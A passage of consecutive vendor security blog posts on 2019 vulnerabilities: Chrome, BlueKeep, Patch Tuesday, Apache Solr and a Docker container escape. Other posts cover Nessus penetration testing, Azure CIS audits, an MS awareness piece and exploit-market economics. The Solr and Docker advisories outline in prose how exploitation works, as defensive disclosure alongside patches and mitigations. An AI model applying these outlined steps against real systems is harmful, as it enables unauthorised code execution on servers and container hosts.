• Wallarm Blog Post on Discovery of the PHP-FPM Flaw
• GitHub Repository with Proof-of-Concept for CVE-2019-11043

Join Tenable's Security Response Team on the Tenable Community.

Learn more about Tenable, the first Cyber Exposure platform for holistic management of your modern attack surface.

Get a free 60-day trial of Tenable.io Vulnerability Management.

Though details are scant, Google released a patch for a Google Chrome vulnerability that has been exploited in the wild as a zero day.

Background

On October 31, Google published a Stable Channel Update for the desktop version of Google Chrome. This release fixes two vulnerabilities, one of which has been exploited in the wild as a zero day.

Analysis

CVE-2019-13720 is a use-after-free (UAF) vulnerability in audio for Google Chrome. It is unclear if the audio component referenced here is associated with content in the media/audio source. The flaw was reported to Google on October 29 by Kaspersky Lab researcher Alexey Kulaev and Anton Ivanov, Head of Advanced Threats Research and Detection. According to Kaspersky, the vulnerability was observed being exploited in the wild as a zero day.

A few days ago our technologies caught a new Chrome 0day exploit used in the wild and we reported it to Google. Just released-Chrome 78 patches it, credits to my colleagues @antonivanovm and Alexey Kulaev for finding the bug. https://t.co/Bgm0QtNO2d

— Costin Raiu (@craiu) November 1, 2019

Additional details about the flaw are restricted from the public, likely in an effort to give users and organizations time to apply patches. However, Kaspersky published some details on their blog, linking the vulnerability to an attack campaign called Operation WizardOpium.

In their blog, Kaspersky researchers identified the vulnerability by following malicious code injection on a Korean-language news portal. Due to “vulnerability disclosure principles,” Kaspersky has not disclosed specific details about the vulnerability itself. However, they do note the exploit “used a race condition bug between two threads due to missing proper synchronization between them.” This race condition results in the UAF that could lead to arbitrary code execution, which Kaspersky says “happens in our case.”

The other vulnerability patched in this Google Chrome for Desktop release is CVE-2019-13721, a UAF vulnerability in the PDFium library reported on October 12 by security researcher banananapenguin.

CVE-2019-13720 is the second UAF vulnerability in the audio component that has been patched in Google Chrome this month. On October 10, CVE-2019-13695, another audio UAF flaw, reported by Man Yue Mo of the Semmle Security Research Team was patched.

Proof of concept

At the time this blog was published, no proof of concept (PoC) for CVE-2019-13720 was available. However, Google acknowledges “an exploit” for the vulnerability “exists in the wild.”

Solution

Google addressed CVE-2019-13720 and CVE-2019-13721 in Google Chrome 78.0.3904.87 for Windows, Mac and Linux. Google notes the patched version will “roll out over the coming days/weeks,” according to the Security Advisory.

Identifying affected systems

A list of Tenable plugins to identify this vulnerability will appear here as they’re released. Additionally, Kaspersky provided indicators of compromise in their blog, which can also be used to identify systems affected by this operation.

Get more information

• Google Chrome Stable Channel Update (78.0.3904.87)
• Google Stable Channel Update Addressing CVE-2019-13695

Join Tenable's Security Response Team on the Tenable Community.

Learn more about Tenable, the first Cyber Exposure platform for holistic management of your modern attack surface.

Get a free 60-day trial of Tenable.io Vulnerability Management.

Researchers identify the first in-the-wild exploit of the BlueKeep vulnerability nearly six months after it was disclosed.

Background

On November 2, security researchers Kevin Beaumont (@GossiTheDog) and Marcus Hutchins (@MalwareTechBlog) confirmed the first in-the-wild exploitation of CVE-2019-0708, also known as BlueKeep.

Analysis

CVE-2019-0708, a critical remote code execution vulnerability in Microsoft’s Remote Desktop Services, was patched back in May 2019. The vulnerability raised eyebrows, particularly because Microsoft released security updates for out-of-support versions of Windows, in an effort to thwart a potential worm that could spread just as WannaCry did in 2017. Beaumont is credited with naming the vulnerability “BlueKeep,” inspired by Game of Thrones. He subsequently set up BlueKeep honeypots to keep tabs on global attempts to exploit the flaw in-the-wild.

CVE-2019-0708 RDP vulnerability megathread, aka BlueKeep.

Going to nickname it BlueKeep as it’s about as secure as the Red Keep in Game of Thrones, and often leads to a blue screen of death when exploited.

— Kevin Beaumont (@GossiTheDog) May 14, 2019

This weekend, Beaumont observed blue screens of death (BSODs) for his BlueKeep honeypots starting on November 2.

huh, the EternalPot RDP honeypots have all started BSOD'ing recently. They only expose port 3389. pic.twitter.com/VdiKoqAwkr

— Kevin Beaumont (@GossiTheDog) November 2, 2019

Beaumont shared a kernel crash dump from his honeypots with Hutchins, who confirmed this as the first exploitation of BlueKeep in the wild.

Blog post on how I discovered mass exploitation of BlueKeep from a kernel dump of a crashed system. https://t.co/2tLdLNosYt

— MalwareTech (@MalwareTechBlog) November 3, 2019

Hutchins shared his analysis in a blog post, where he identified the attackers were utilizing a recently released exploit module to distribute a cryptocurrency (or “coin”) miner, dubbed “BlueKeep Monero Miner” which is detected by 44% of scanners on VirusTotal as of November 3. Beaumont shared his insights in a blog post as well.

Though it took several months for the first in-the-wild exploit of BlueKeep to be seen, the expectation has always been there. Back in July, a cryptocurrency mining botnet known as WatchBog incorporated a BlueKeep scanning module to identify vulnerable systems. In August, there was chatter that a BlueKeep exploit would be incorporated into open-source tools.

While this in-the-wild exploit isn’t a WannaCry-level event, it serves as a cautionary reminder that organizations with vulnerable systems should prioritize patching them immediately.

Solution

Tenable recommends applying patches immediately. The following table contains the relevant security updates and monthly rollups for various products.

In addition to patching, Tenable recommends the following mitigation steps:

• Enable Network Level Authentication (NLA). Microsoft recommends NLA as a mitigation, however, NLA may be something an organization chooses to deploy in addition to patching.
• Block RDP (Default is TCP port 3389) at your perimeter firewall.
• Disable any unused services.
• Upgrade end-of-life (EOL) operating systems. As a reminder, Windows 7 goes EOL on January 14, 2020.

Identifying affected systems

Tenable released a remote check plugin for CVE-2019-0708 after Microsoft disclosed the vulnerability. This plugin can identify affected systems without providing credentials.

To identify systems that do not have NLA enabled, please use plugin 58453.

A list of all plugins to identify BlueKeep (CVE-2019-0708) are available here.

Get more information

• Marcus Hutchins’ Blog on BlueKeep Exploited in the Wild (KryptosLogic)
• Kevin Beaumont's blog on BlueKeep Exploited in the Wild
• Microsoft Blog Announcing Fix for CVE-2019-0708
• Microsoft Customer Guidance for CVE-2019-0708

Join Tenable's Security Response Team on the Tenable Community.

Learn more about Tenable, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.

With over 70 CVEs, Microsoft’s November 2019 Patch Tuesday corrects 13 critical vulnerabilities, including a patch for an Internet Explorer vulnerability exploited in the wild.

Microsoft’s November 2019 Patch Tuesday contains updates for 74 CVEs, 13 of which are rated critical. This month’s release covers 16 remote code execution (RCE) vulnerabilities and 27 elevation of privilege (EoP) flaws across a variety of products. Additionally, Microsoft has patched an increased number of vulnerabilities in Hyper-V, a number of which were denial of service (DoS) flaws. The following is a breakdown of the most important CVEs from this month’s release.

CVE-2019-1429 | Scripting Engine Memory Corruption Vulnerability

CVE-2019-1429 is a critical flaw in Internet Explorer, which Microsoft notes as being exploited in the wild. This RCE exists due to a flaw in the way the scripting engine handles objects in memory in Internet Explorer. An attacker who is able to exploit this vulnerability could gain the same rights as the current user. Exploitation is somewhat mitigated in that an attacker would need to entice a user to visit a crafted web site or embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document.

CVE-2019-0721, CVE-2019-1397, CVE-2019-1398, CVE-2019-1399 | Hyper-V Remote Code Execution Vulnerabilities

CVE-2019-0721, CVE-2019-1397, CVE-2019-1398, and CVE-2019-1399 are RCE vulnerabilities in Windows Hyper-V. An attacker could run malicious code on a guest operating system that could cause the Windows Hyper-V host to execute arbitrary code. An attacker would need to gain access to a virtual machine (VM) through other means on the vulnerable host, but once access is obtained, an attacker could escape the VM sandbox and pivot to other VMs on the same host.

CVE-2019-1457 | Microsoft Office Excel Security Feature Bypass

CVE-2019-1457 is a security feature bypass vulnerability in Microsoft Office for Mac caused by a failure to enforce macro settings in an Excel document. This flaw was publicly disclosed on October 30 by Outflank, an IT Security firm focused on red teaming and security testing. The Outflank blog post details attack scenarios using the SYLK file format to include XLM macros into SYLK files. Because SYLK files do not open in Protected View, an end-user opening a specially crafted file would receive no warning or prompt from Excel about opening the file and would have none of the protection offered by the Protected View security feature. Additionally, if Office for Mac has been configured to use the “Disable all macros without notification” feature, XLM macros in SYLK files can be executed without prompting the user, thereby allowing a remote attacker to execute arbitrary code with the privileges of the user opening the specially crafted file.

CVE-2019-0712, CVE-2019-1310, CVE-2019-1309, CVE-2019-1399, and CVE-2019-1399 | Hyper-V Denial of Service Vulnerabilities

CVE-2019-0712, CVE-2019-1310, CVE-2019-1309, and CVE-2019-1399 are denial of service (DoS) vulnerabilities within Windows Hyper-V. An attacker who has the toolsets to exploit this vulnerability could consume the resources of a target server and cause it to crash. Attackers need a privileged account on the guest operating system, running as a VM to exploit this vulnerability.

CVE-2019-16863 | Microsoft Guidance for Vulnerability in Trusted Platform Module (TPM)

As part of the November updates, Microsoft released the security advisory ADV190024 to discuss CVE-2019-16863. In certain Trusted Platform Module (TPM) chipsets, a vulnerability exists which weakens key confidentiality protection for the Elliptic Curve Digital Signature Algorithm (ECDSA). While this flaw is not in Windows and does not exist in a specific application, it was important enough that Microsoft released this advisory. Administrators are encouraged to contact their TPM manufacturer for firmware updates as well as verify additional mitigation steps that may be required beyond a firmware update. At the time this blog was published, Microsoft notes that there does not appear to be any evidence of an exploit in the wild and that the issue was reported through coordinated disclosure.

Tenable Solutions

Users can create scans that focus specifically on our Patch Tuesday plugins. From a new advanced scan, in the plugins tab, set an advanced filter for Plugin Name Contains November 2019.

With that filter set, click on the plugin families to the left, and enable each plugin that appears on the right side. Note that if your families on the left say Enabled then that means all of the plugins in that family are set. Disable the whole family before selecting the individual plugins for this scan. Here’s an example from Tenable.io:

A list of all of the plugins released for Tenable’s November 2019 Patch Tuesday update can be found here. As always, we recommend patching systems as soon as possible and regularly scanning your environment to identify those systems that are yet to be patched.

As a reminder, Windows 7 support will be discontinued on January 14, 2020, so we strongly recommend reviewing what hosts remain and any action plans for migration. Plugin ID 11936 (OS Identification) can be useful for identifying hosts that are still running on Windows 7.

Get more information

• Microsoft’s November 2019 Security Updates
• Tenable plugins for Microsoft November 2019 Patch Tuesday Security Updates
• CERT Vulnerability Note VU#125336 for CVE-2019-1457

Join Tenable's Security Response Team on the Tenable Community.

Learn more about Tenable, the first Cyber Exposure platform for holistic management of your modern attack surface.

Get a free 60-day trial of Tenable.io Vulnerability Management.

Linux servers using Apache Solr versions 8.1.1 and 8.2.0 with default configurations are potentially vulnerable to remote code execution.

Background

On July 22, 2019, a configuration flaw in versions 8.1.1 and 8.2.0 was found in Apache Solr, the open-source search-engine platform. John Ryan originally reported the issue and credit was also given to Matei “Mal” Badanoiu for noting the flaw could lead to remote code execution (RCE).

Analysis

CVE-2019-12409 is a flaw in the default configuration of the solr.in.sh file in Apache Solr. If this file is used in its default configuration in versions 8.1.1 and 8.2.0, unauthenticated access to the Java Management Extensions (JMX) monitoring on the RMI_PORT (default 18983) is allowed. Anyone with access to a vulnerable Solr server, and, in turn, JMX, could upload malicious code that could then be executed.

Proof of concept

There is currently a proof of concept (PoC) available in a GitHub repository implementing the MJET script by MOGWAI LABS to create a reverse shell on a system with the vulnerable configuration.

CVE-2019-12409 Apache Solr RCE pic.twitter.com/NFClK5M5od

— Jas502n (@jas502n) November 19, 2019

Solution

On November 18, Apache Solr revised the originally reported bug report after it was found that the flaw could lead to RCE. In addition, the Changelog highlighted this flaw as one of the fixes in Apache Solr version 8.3.

Per the security advisory, this vulnerability can also be remediated by setting the ENABLE_REMOTE_JMX_OPTS parameter to ’false’ in the solr.in.sh file. The change can be confirmed by ensuring the com.sun.management.jmxremote* properties are not listed in the Solr Admin interface under the Java Properties section.

Identifying affected systems

A list of Tenable plugins to identify this vulnerability will appear here as they’re released.

Get more information

• Solr Security Advisory
• Attacking RMI Based JMX Services
• Solr Bug Tracker for CVE-2019-12409
• GitHub Repository with PoC for CVE-2019-12409

Join Tenable's Security Response Team on the Tenable Community.

Learn more about Tenable, the first Cyber Exposure platform for holistic management of your modern attack surface.

Get a free 60-day trial of Tenable.io Vulnerability Management.

Proof-of-concept (PoC) code for a security flaw in Docker, the popular containerization platform, is now public.

Background

On November 19, researchers at Unit 42, Palo Alto Networks’ research team, published their analysis of a severe vulnerability in the popular container deployment platform, Docker.

Analysis

CVE-2019-14271 is a critical code injection flaw in the Docker copy (docker cp) command, which is used to copy files between containers. Exploitation of this flaw can lead to full container escape by an attacker. It is important to note that to exploit this vulnerability, an attacker would need to include the exploit code in a malicious Docker container image or compromise a container either via another vulnerability or using previously leaked Docker secrets.

While the vulnerability was patched back in July 2019, researchers from Unit 42 published their analysis of the flaw on November 19. According to these researchers, the vulnerability exists in docker cp because a helper process (docker-tar) improperly loads specific libraries from the container file system rather than from the host file system. Specifically, docker-tar loads the Name Service Switch (NSS) libraries, identified by their filenames beginning with libnss. Targeting docker-tar presents an attacker with the necessary capability to gain full root access on the host file system.

To demonstrate exploitation of CVE-2019-14271, the researchers created their own version of an NSS library (libnss_files.so) and added a function called run_at_link(). The function performs a check to ensure it has been invoked by docker-tar first, followed by a step to replace the malicious libnss_files.so file with the legitimate one, because it is only intended to run once. Finally, the NSS library will request an executable that writes a message to a specified path (/evil) and mounts the host filesystem on the container at the /host_fs path. A video demonstration of this exploit can be found in the Palo Alto Networks blog.

Proof of concept

In their blog, Unit 42 researchers included a PoC in the form of a malicious NSS library file, libnss_files.so.

Solution

As mentioned previously, Docker patched this vulnerability back in July in Docker version 19.03.1. Docker users are encouraged to update as soon as possible.

If updating to a patched version is not feasible at this time, users are strongly encouraged to only use trusted Docker container images that have been verified and/or signed. Additionally, please consider using non-root users when launching containers, as that would mitigate the threat this vulnerability poses.

Identifying affected systems

A list of Tenable plugins to identify this vulnerability can be found here.

Get more information

• Palo Alto Networks blog on CVE-2019-14271
• Release Notes from Docker for version 19.03.1
• Debian Security Tracker for CVE-2019-14271
• SUSE Advisory for CVE-2019-14271

Join Tenable's Security Response Team on the Tenable Community.

Learn more about Tenable, the first Cyber Exposure platform for holistic management of your modern attack surface.

Get a free 60-day trial of Tenable.io Vulnerability Management.

By the time a data breach occurs, it may be too late to measure the effectiveness of your vulnerability management program. Penetration testing can help detect weaknesses – before threat actors do. Here’s how to get started.

Looking to proactively measure the effectiveness of your vulnerability management program? How can you assess the strengths and weaknesses of your program before a data breach occurs? 

Penetration testing – of which vulnerability scanning is a key component – can help your organization find weaknesses, allowing you to resolve them before threat actors can exploit them. 

Gauge your vulnerability assessment maturity

If you’re unsure of the maturity of your vulnerability assessment and management program, check out this short What’s Your Cyber Defender Style? quiz to see how your organization’s cybersecurity practices rank. You can also get more information about the maturity of your organization’s vulnerability assessment practices in the Cyber Defender Strategies report.

Before delving into the critical role vulnerability scanning plays within penetration testing, let’s define its purpose and how it differs from vulnerability management and assessment.

What is penetration testing?

Penetration testing is a stand-alone activity, often repeated quarterly or annually by a third party. The primary objective is to provide organizations with independent insight into the effectiveness of their vulnerability assessment and management processes. 

Penetration tests generally consist of five phases: 

1. Initial engagement: Selecting a firm to conduct the penetration test and outlining goals and expectations
2. Scoping: Establishing the targets, methodology and boundaries for the test
3. Testing: Conducting the penetration test based on agreed-upon parameters
4. Reporting: Reviewing the findings from the penetration test
5. Follow-up: Tracking remediation progress and retesting

Tip: During the scoping phase, it’s best to share results from your organization's vulnerability management program, so the third-party penetration tester has a baseline to draw accurate conclusions on the efficacy of your program.

The difference between penetration testing and vulnerability management

Penetration testing sheds light on whether the vulnerability assessment and management program is working correctly and indicates areas of improvement. For example, the penetration test provides a point-in-time view of whether environments contain known vulnerabilities. Vulnerability management, on the other hand, is ongoing and continuous. 

The organization’s cybersecurity operations team is responsible for vulnerability management. They inform, drive, prioritize and verify vulnerability remediation for an organization. For this reason, the security team should perform vulnerability scans as frequently as operationally possible because the list of known vulnerabilities changes from day to day, as does their threat level.

Where does vulnerability scanning fit in?

During the testing phase of a penetration test, depending on the scope, the tester will perform vulnerability scans across an organization’s entire attack surface or a specifically targeted subset. The latter could include, but is not limited to: external networks, internal networks, cloud assets, web applications, IoT and/or OT. 

These tests take two primary approaches: 

1. Blackbox testing, where no information is shared with the tester
2. Whitebox testing, where all information about the target is shared with the tester

Nessus Professional, the most widely used vulnerability scanner in the world, can assist with both of these test types as it provides out-of-the-box templates for both credentialed and non-credentialed scanning.

Vulnerability scanning in blackbox testing

When scanning for vulnerabilities as part of blackbox testing, network sweeps are typically performed using Internet Control Message Protocol (ICMP), Transmission Control Protocol (TCP) or address resolution protocol (ARP) pings without the use of credentials. Once an asset is discovered, the scan will query any open network ports on the device to collect: 

• Operating system information about the device
• The network services running on the device
• The network-based vulnerabilities on the device

This information is then used to determine the vulnerabilities that reside on the target that may be susceptible to remote exploitation, which is particularly problematic for assets on an external network.

Vulnerability scanning in whitebox testing

Vulnerability scanning during whitebox testing is usually a lot more targeted, as all the information about the target is already known. This vulnerability scan would typically be performed using a credentialed vulnerability and configuration scan, whereby the scanner would remotely log in to an asset and assess any vulnerabilities or configurations that may be susceptible to exploitation with both local and remote attacks.

How can Nessus Professional help with penetration testing?

Nessus Professional has built-in templates you can use to perform both blackbox and whitebox tests quickly and easily. These templates enable credentialed, non-credentialed and configuration scanning, which support several compliance frameworks; CIS, HIPPA, DISA STIG and many others. 

Tailor templates to suit the required level of testing

You can customize the templates to suit the level of testing required. For instance, you can set your preference to avoid false positives or false negatives. 

To avoid false positives, Nessus Professional, by default, will only report vulnerabilities that it can confirm exist. During a penetration test, this may not be the desired output. Instead, the penetration tester may want to collect information on all possible vulnerabilities and then perform manual testing to eliminate any false positives within the results. 

Also, Nessus Professional, by default, is configured to only perform safe checks, which means the scans carried out as part of the penetration test will cause no damage or downtime to the targets. The data collected during the vulnerability scans can easily be exported to assist the penetration tester in building their report using metrics like CVSS to help the organization understand the criticality of the findings.

The data collected during these tests can also be used to drive other key aspects of penetration testing. For instance, during a testing scenario, the data that has been collected can be used to map out cyberattack paths, including: 

• How an attack could breach an organization’s network
• How a breach could traverse the network once inside
• What key assets could be exploited – and the level of data loss that may occur

In turn, the scenarios can then be used to: 1) inform the organization where their weaknesses lie and 2) perform simulated, non-damaging attacks on the organization’s environment to test out their defenses and responses to such an attack. 

Get more information

Find out how Nessus Professional can help with penetration testing.

Start your free trial now

Apache Solr remains vulnerable to a zero day weeks after proof-of-concept code became public.

Background

On October 29, a proof of concept (PoC) for a remote code execution (RCE) vulnerability in Apache Solr, a popular open-source search platform built on Apache Lucene, was published as a GitHub Gist. At the time this blog was published, this vulnerability did not have a CVE identifier and no confirmation or indication of a solution available from Apache. Tenable Research has confirmed that Apache Solr versions 7.7.2 through 8.3 (the most current release) are vulnerable, and we suspect older versions that include the Config API are potentially vulnerable.

Analysis

According to the PoC, an attacker could target a vulnerable Apache Solr instance by first identifying a list of Solr core names. Once the core names have been identified, an attacker can send a specially crafted HTTP POST request to the Config API to toggle the params resource loader value for the Velocity Response Writer in the solrconfig.xml file to true.

Enabling this parameter would allow an attacker to use the velocity template parameter in a specially crafted Solr request, leading to RCE.

Despite the recent release of Apache Solr 8.3 that addresses a default configuration flaw that was reported back in July, it appears the Velocity template vulnerability still exists as a zero day.

Proof of concept

As mentioned previously, a PoC was published on October 29 as a Github Gist. Days later, an exploit script was published to a GitHub repository.

Solution

At the time this blog was published, no patch was available for this vulnerability. We will update this blog post once a patch is available. Until a patch is available, or if upgrading is not feasible, users can mitigate attacks leveraging this vulnerability by adding authentication to the Apache Solr instance. Also, review the VelocityResponseWriter class in the solrconfig.xml configuration file and ensure the params resource loader value is set to false.

Be advised that unless the Config API is locked down, an attacker could modify the solrconfig.xml file.

Identifying affected systems

A list of Tenable plugins to identify this vulnerability will appear here as they’re released.

Get more information

• s00py’s GitHub Gist for Apache Solr RCE (Velocity Template)
• jas502n's Exploit Script for Apache Solr RCE (Velocity Template)

Join Tenable's Security Response Team on the Tenable Community.

Learn more about Tenable, the first Cyber Exposure platform for holistic management of your modern attack surface.

Get a free 60-day trial of Tenable.io Vulnerability Management.

Microsoft Azure is a cloud offering that provides infrastructure-as-a-service (IaaS), platform-as-a-service (PaaS) and software-as-a-service (SaaS) solutions. With the complexities associated with the cloud, auditing Azure architecture is challenging but vital to an organization’s cyber hygiene. Let's walk through how to audit Azure with Tenable.

Refactoring Microsoft Azure support to align with CIS guidance

Previously, compliance support in Tenable products was limited to the items and capabilities offered in the TNS Azure Best Practice audit files. Since those audit files were released, additional community guidance has come out, specifically guidance from the Center for Internet Security (CIS). To fully support the new CIS recommendations and incorporate feedback from customers using the TNS Azure Best Practice audits, we significantly refactored our Azure support in Tenable.io and Nessus.

Level 1 and Level 2 .audit files

This new CIS guidance offers users choices between Level 1 and Level 2 recommendations similar to its other benchmarks:

• Level 1: Generally, these recommendations should provide good security benefits without affecting most uses of the platform. 
• Level 2: These settings are more secure, but can affect usage and workflows. As always, we recommend reviewing and testing new configurations to identify any settings that impact your business processes.

An example recommendation found in the CIS benchmark is to ensure RDP or SSH access is restricted from the internet for virtual machines. Such a misconfiguration could be catastrophic for an organization if utilized as an attack vector. Auditing Azure with Tenable audits based on CIS guidance ensures these misconfigurations are found and can be remediated in a reliable and expedient manner.

New audits being released

These new audits are based on the most recent benchmark guidance from CIS and should be considered direct replacements for the existing best-practice audits:

• CIS_Microsoft_Azure_Foundations_L1_v1.1.0.audit
• CIS_Microsoft_Azure_Foundations_L2_v1.1.0.audit

Existing audits being retired

Due to the refactoring of the compliance plugin for Azure and the more extensive coverage of the CIS benchmark, the existing TNS Azure Best Practice audits are being retired:

• TNS Microsoft Azure Best Practices Audit v1.0
• TNS Microsoft Azure Database Best Practices Audit v1.0.0
• TNS Microsoft Azure Websites Best Practices Audit v1.0.0

CIS Microsoft Azure Foundations Benchmark

The CIS Microsoft Azure Foundations benchmark is divided into multiple sections:

Identity and Access Management

Key recommendations include: 

• Multi-factor authentication 
• No guest users 
• Users cannot register applications

Security Center

This section focuses on making sure key alert policies (e.g., ASC Default) are configured. 

Storage Accounts

Key recommendations include: 

• Enabling “secure transfer required”
• Setting default network access rule to “deny”

Database Services

Key recommendations include: 

• “Ensuring Auditing is set to On” 
• “Audit Retention is set to greater than 90 days“
• “Threat Detection types“ is set to “all“

Logging and Monitoring

A quality logging configuration is imperative to any secure IT environment. This section includes configuration checks to ensure: 

• Logging for Azure Keyvault is enabled
• Activity Log Retention is set to 365 days or greater 
• Log Profiles exist

Networking

A secure networking configuration is vital in a cloud environment. Some examples of CIS recommendations in this section are:

• “Ensuring that RDP/SSH access is restricted from the Internet“ 
• “Network Security Group Flow log retention is set to greater than 90 days“

Virtual Machine

Key recommendations include ensuring: 

• Disks are encrypted 
• Only approved extensions are installed

AppService

For Azure AppService, there are many recommendations to ensure the latest versions of the software are used as well as authentication and redirects are securely configured.

Other Security Considerations

Other security considerations include:

• Verifying expiration dates are set for keys and secrets 
• Ensuring resource locks are used where appropriate

Check Overview

To audit appropriate configuration information as described in the CIS benchmark, Tenable has updated its Azure plugin with a list of new request types. An example check type using a new request type is here:

How to audit Microsoft Azure Foundations with Tenable using the CIS benchmark

Auditing an Azure environment requires some extra steps. As part of our release of plugin enhancements and audit coverage for the CIS benchmarks, we have implemented a new key credential type to simplify scanning setup. 

At a high level, this involves: setting up an application registration in the Azure Active Directory (AD), ensuring it has proper API permissions, generating a secret key and providing the Tenable scan policy the appropriate client ID and key.

An example summary output for the CIS benchmarks: 

Below is a closer view of one of the results. This page shows:

• Pass/Fail status
• Remediation steps, if necessary
• Individual results from the systems scanned
• Reference information to cybersecurity frameworks

An example failing configuration check:

An example passing configuration check:

Summary

Auditing an Azure environment with Tenable.io and Nessus requires a little bit of extra setup compared to our standard compliance plugins but allows for a secure and automated method for evaluating your organization’s compliance. 

At Tenable, we regularly update our policy compliance audits to match the newest versions by CIS and the U.S. Defense Information Systems Agency (DISA) to ensure our customers can easily keep pace with the latest best practices.

Azure compliance scan setup

The Azure plugin will scan the Azure REST API and audit the environment's configuration.

Scan requirements

Credentials

The plugin requires one of two supported credential sets.

• Password: This legacy credential set requires the username and password of a scan account created in Azure AD and the Application ID of a registered application.
• Key: This credential set requires the Application ID and client secret of a registered application as well as the Tenant ID.

Azure environment setup

To use the legacy password–based authentication for your scan, follow these steps:

Create Azure AD user account

1. Create a new user for scanning in Azure AD

Assign user the Reader role

1. Click the Subscriptions Blade -> **Your Subscription** -> Access Control (IAM) -> Role Assignments -> (+ Add)
2. Add the Reader role to the user account you previously created for scanning

Register application - password

1. Click Azure Active Directory->App Registrations
2. Click the New Registrations application
3. Give the application a name, choose your supported account types for your environment and click the register button
4. Click Authentication and choose Yes for Default Client Type/Treat application as a public client

Assign API permissions

1. Click your registered application in Azure Active Directory -> App Registrations - > Your Application -> API Permissions
2. Add the following API permissions and click Grant admin consent for:
1. Azure Active Directory Graph -> Directory.Read.All
2. Azure Active Directory Graph -> User.Read
3. Azure Service Management -> user_impersonation

To use the Key-based authentication method for your scan, follow these steps:

Register application - key

1. Click Azure Active Directory -> App Registrations
2. Click the New Registrations Application
3. Give the application a name, choose your supported account types for your environment and click the register button
4. Choose Public Client/Native for the redirect URI type. Add a redirect URL and click Register

Create application client secret

1. Click your registered application in Azure Active Directory -> App Registrations
2. Click Certificates and Secrets
3. Click + New Client Secret
4. Give the secret a name and click Add
5. Copy the secret somewhere safe for use in authenticating during a scan

Assign the application the Reader role

1. Click the Subscriptions Blade -> **Your Subscription** -> Access Control (IAM) -> Role Assignments -> (+ Add)
2. Add the 'Reader' role to the application you previously created for scanning

Assign API permissions

1. Click your registered application in Azure Active Directory -> App Registrations - > Your Application -> API Permissions
2. Add the following API permissions and click Grant admin consent for:
1. Azure Active Directory Graph -> Directory.Read.All
2. Azure Active Directory Graph -> User.Read
3. Azure Service Management -> user_impersonation

Join Tenable's Audit and Compliance Research Team on the Tenable Community.

Learn more about Tenable, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.

In the spirit of Giving Tuesday, we’re featuring the Multiple Sclerosis Foundation, Tenable’s We Care → In Action global cause for 2019. Here, our own Adrian Morgan, senior marketing operations manager, shares five lessons she learned while navigating the life-altering disease. 

“We Care” – these two compact words represent one of our company’s core values. Simple sentiment, right? But if you take them to heart, you can really make a difference.

This year, as part of our We Care → In Action initiative, we invited employees to submit nominations for charitable organization sponsorship. These were causes employees were already contributing to in some way. By selecting one organization, we could rally efforts together as one global community. Throughout 2019, Tenable employees have had opportunities to participate in a global care package drive for MS patients who struggle financially, make monetary donations and learn about MS through shared resources and even directly from a Multiple Sclerosis Foundation representative. 

In short, We Care → In Action is a way for employees to live our We Care core value. 

That’s why we’re excited to honor today’s GivingTuesday – “a day that encourages people to do good.”

“Whether it’s making someone smile, helping a neighbor or stranger out, showing up for an issue or people we care about, or giving some of what we have to those who need our help, every act of generosity counts and everyone has something to give.” – GivingTuesday.org

So, in the spirit of Giving Tuesday, we’re turning to one of Tenable’s own employees who recounts her experiences with MS, reminding us the inspiration to reach far out starts from deep within.

"Every person’s experience with Multiple Sclerosis (MS) is wildly different. I went from being the person who has a family member with MS to being the person with MS. It was April 2012. Work was crazy, home was crazy and I was stressed. It started with my head feeling like it was in the Iron Claw (wrestling fans should remember Fritz Von Erich), but I brushed it off as a migraine, despite never having migraines before. I finally called my primary care when the vision in my left eye was completely gone. He sent me straight to the eye doctor who dealt with emergencies. I was in a chair with a light directly in my eye, and I couldn’t see it. The doctor held the giant F at the top of the eye chart in front of my face, but I couldn’t see anything. The doctor started running tests. I got sent for IV steroids, which was supposed to help with inflammation – the only thing they could see – but they couldn’t figure out what was causing it.

Oh no! What did I do? I should have called the doctor sooner (don’t be like me, kids). After a few days of agonizingly slow waiting, results were finally in: the doctor suspected MS. I got sent to a neurologist for final results, who agreed and I started my treatment. I am 100% better now, but still have flares and will for the rest of my life.

Five lessons learned working with Multiple Sclerosis

Some things I learned while navigating this disease without letting it take over my life:

1. Learn as much as you can about the disease. While people mean well, you will probably get a lot of misinformation. Become a master of your own journey.
2. Be honest with your supervisor. You are going to need to bag out on work for doctor’s appointments fairly often in the beginning. While it is no one’s business what you are going through, being honest is best. You don’t want people assuming you are up to no good.
3. Take notes (about everything!). You are going to be stressed and forget things. So, carry a notebook (or take notes on your phone). I filled up two notebooks in the first few months after dx – one for the doctors, one for work. 
4. Take time for yourself. There is an immediate feeling of hopelessness, but don’t let it take you. Do something that makes you smile. 
5. Finally, all hope is NOT gone. This disease comes with a lot of unknowns, but there is a lot of support out there for us. 

I have MS. MS doesn’t have me.”

– Adrian Morgan, senior marketing operations manager at Tenable, lives with Relapsing Remitting MS (RRMS)

Get involved

To participate in the MS community and/or share your experiences, visit: https://msfocus.org/

To learn more about MS, check out these videos recommended by Adrian:

• What are the different types of MS? 
• Is MS contagious? 
• How is MS diagnosed?

Want to take part in GivingTuesday? Here are some easy ways to get started:

• Learn how can give back to your community (GivingTuesday.org)
• Join the conversation on Twitter (#GivingTuesday)

Last week, Tenable Research released the report, How Lucrative Are Vulnerabilities? A Closer Look at the Economics of the Exploit Supply Chain, which takes a close look at the vulnerability-to-exploit supply chain and ecosystem.

The journey a software flaw takes – from being discovered and disclosed as a vulnerability to exploit development to ultimately being used in a cyberattack – includes many different travelers and stops. We chose to portray this journey in the form of a simplified vulnerability-to-exploit (V2E) supply chain model, which consists of only four main players:

1. Producers: Discover vulnerabilities and then develop proof-of-concept exploit code. 
2. Suppliers: Facilitate the brokering and general availability of exploits and related knowledge to the market. 
3. Service providers: Integrate exploits into a variety of third-party products and services – from penetration testing frameworks to exploit kits. 
4. Consumers (e.g., end-user organization conducting a penetration test, criminal gang perpetrating fraud): Use the exploits.

The V2E simplified supply chain

To learn more about the model and associated market actors, download the report. In this blog post, we’ll delve into one of the more interesting aspects of the V2E ecosystem.

Three markets of the vulnerability-to-exploit supply chain

While this supply chain model does a great job of breaking down the individual actors, it does hide a significant difference from most other markets. What makes the V2E supply chain so unique is it straddles three very different market segments: the white, gray and black markets. 

• White market in vulnerabilities and exploits: Primarily composed of cybersecurity vendors and researchers focused on making intelligence widely available. It has driven the price of zero-day exploits into astronomic six-digit figures.
